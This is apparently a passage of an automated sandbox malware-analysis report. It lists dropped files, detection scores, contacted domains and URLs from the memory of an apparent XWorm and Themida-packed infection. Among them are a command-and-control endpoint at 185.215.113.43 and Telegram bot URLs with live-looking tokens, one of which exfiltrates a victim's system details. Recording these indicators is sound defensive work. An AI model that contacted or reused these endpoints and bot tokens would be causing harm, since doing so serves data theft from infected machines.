                    C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md__mypyc.cp313-win_amd64.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\libcrypto-3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\libffi-8.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\libssl-3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\pyexpat.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\python313.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32\pywintypes313.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\select.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\sqlite3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\unicodedata.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\win32\win32crypt.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe47%ReversingLabsWin32.Packed.Themida
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://ocsp.accv.esS0%Avira URL Cloudsafe
                    http://185.215.113.43/Zu7JuNko/index.php8100%Avira URL Cloudmalware
                    http://185.215.113.43/Zu7JuNko/index.phpd-b6bf-11d0-94f2-00a0c9100%Avira URL Cloudmalware
                    https://peps.python.org/pep-0685/Pp0%Avira URL Cloudsafe
                    http://185.215.113.43/Zu7JuNko/index.php$100%Avira URL Cloudmalware
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    bg.microsoft.map.fastly.net
                    199.232.210.172
                    truefalse
                      high
                      chrome.cloudflare-dns.com
                      162.159.61.3
                      truefalse
                        high
                        api.myip.com
                        172.67.75.163
                        truefalse
                          high
                          thedotmediagroup.com
                          188.165.52.14
                          truefalse
                            unknown
                            ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                            94.245.104.56
                            truefalse
                              high
                              sb.scorecardresearch.com
                              3.160.188.18
                              truefalse
                                high
                                www.google.com
                                142.250.181.100
                                truefalse
                                  high
                                  api.telegram.org
                                  149.154.167.220
                                  truefalse
                                    high
                                    googlehosted.l.googleusercontent.com
                                    142.250.181.65
                                    truefalse
                                      high
                                      clients2.googleusercontent.com
                                      unknown
                                      unknownfalse
                                        high
                                        bzib.nelreports.net
                                        unknown
                                        unknownfalse
                                          high
                                          assets.msn.com
                                          unknown
                                          unknownfalse
                                            high
                                            c.msn.com
                                            unknown
                                            unknownfalse
                                              high
                                              ntp.msn.com
                                              unknown
                                              unknownfalse
                                                high
                                                api.msn.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  NameMaliciousAntivirus DetectionReputation
                                                  https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.48132e5427deb971ee28.jsfalse
                                                    high
                                                    https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A6513EFE8757A60506E5F%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20EVTO372NG%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6false
                                                      high
                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://github.com/astral-sh/ruffsamat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagessamat.exe, 00000008.00000002.4557868272.000001BCCC600000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          high
                                                          https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svgsamat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://github.com/python/importlib_metadata/issuessamat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551021868.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554916521.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://wheel.readthedocs.io/en/stable/news.htmlsamat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://185.215.113.43/Zu7JuNko/index.phpnuskotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-filesamat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516814567.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529818458.000001BCCC96F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551562745.000001BCCC972000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560430089.000001BCCC973000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526822123.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://importlib-metadata.readthedocs.io/samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://packaging.python.org/en/latest/specifications/core-metadata/samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64samat.exe, 00000008.00000003.4503586193.000001BCCC093000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513113910.000001BCCC0B6000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018744804.000001BCCC3E4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3016877538.000001BCCC3E4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509147637.000001BCCC094000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4512873377.000001BCCC09D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499785539.000001BCCC06D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502296671.000001BCCC070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://github.com/pypa/packagingsamat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://github.com/pypa/packagingpsamat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://readthedocs.org/projects/importlib-metadata/badge/?version=latestsamat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://refspecs.linuxfoundation.org/elf/gabi4samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://blog.jaraco.com/skeletonsamat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de11zsamat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://185.215.113.43/Zu7JuNko/index.phpcodedskotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://tools.ietf.org/html/rfc3610samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD427000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://github.com/platformdirs/platformdirssamat.exe, 00000008.00000002.4562069346.000001BCCCE00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://crl.dhimyotis.com/certignarootca.crlsamat.exe, 00000008.00000003.4518409392.000001BCCD348000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524395230.000001BCCD342000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4521907829.000001BCCD34D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562686604.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529360624.000001BCCD347000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://curl.haxx.se/rfc/cookie_spec.htmlsamat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.mdsamat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;samat.exe, 00000008.00000003.3008901685.000001BCCC4B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamesamat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxysamat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.accv.es/legislacion_c.htm2samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://pypi.org/project/build/).samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://api.telegram.org/bot8095725853/senddocument?chat_id=7027613045%3aaagx3rpo-1uhb195if6jixakjypsamat.exe, 00000008.00000002.4565419860.000001BCCDC34000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://chrome.google.com/webstorechrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://wwww.certigna.fr/autorites/0msamat.exe, 00000008.00000003.4524395230.000001BCCD342000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562686604.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529360624.000001BCCD347000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://github.com/pypa/wheelsamat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.python.org/dev/peps/pep-0427/samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readersamat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4549329802.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551021868.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4542418426.000001BCCBFFB000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554916521.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554983007.000001BCCC000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://github.com/python/cpython/issues/86361.samat.exe, 00000008.00000003.3021175651.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018678721.000001BCCC7CF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024391863.000001BCCC374000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526403156.000001BCCC46C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507302414.000001BCCC46A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504313591.000001BCCC469000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018744804.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502404142.000001BCCC466000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518851615.000001BCCC46A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4512558074.000001BCCC46A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3020091541.000001BCCC468000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://httpbin.org/samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://passport.net/tbsvchost.exe, 00000019.00000002.6314363798.0000022FAD702000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_modulesamat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachessamat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml0samat.exe, 00000008.00000002.4562069346.000001BCCCE00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://img.shields.io/badge/skeleton-2024-informationalsamat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-thesamat.exe, 00000008.00000003.4500627948.000001BCCC7F0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4532440818.000001BCCC7FE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4530927299.000001BCCC7FD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559196622.000001BCCC7FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563998531.000001BCCD441000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://github.com/pypa/setuptools/issues/417#issuecomment-392298401samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://crl.securetrust.com/STCA.crlsamat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://tools.ietf.org/html/rfc6125#section-6.4.3samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://185.215.113.43/Zu7JuNko/index.phpdedskotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://chromewebstore.google.com/chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.cert.fnmt.es/dpcs/samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://google.com/mailsamat.exe, 00000008.00000003.4523890696.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513181603.000001BCCC7E8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507086114.000001BCCC7C0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523746156.000001BCCC7E9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502168541.000001BCCC995000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://img.shields.io/pypi/v/importlib_metadata.svgsamat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://github.com/jaraco/jaraco.functools/issues/5samat.exe, 00000008.00000002.4561955068.000001BCCCD00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://www.accv.es00samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://www.rfc-editor.org/info/rfc7253samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563798977.000001BCCD40E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://api.telegram.org/bot8095725853/sendDocument?chat_id=7027613045%3AAAGX3rPO-1UHB195if6JIXakjYPsamat.exe, 00000008.00000002.4565419860.000001BCCDC34000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560489792.000001BCCC97E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://mahler:8092/site-updates.pysamat.exe, 00000008.00000003.3023133248.000001BCCC89F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3023133248.000001BCCC835000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527191112.000001BCCC8B7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://tools.ietf.org/html/rfc7231#section-4.3.6)samat.exe, 00000008.00000003.4527003356.000001BCCC85F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509758777.000001BCCC85C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC85E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC85F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://185.215.113.43/Zu7JuNko/index.phpd-b6bf-11d0-94f2-00a0c9skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                unknown
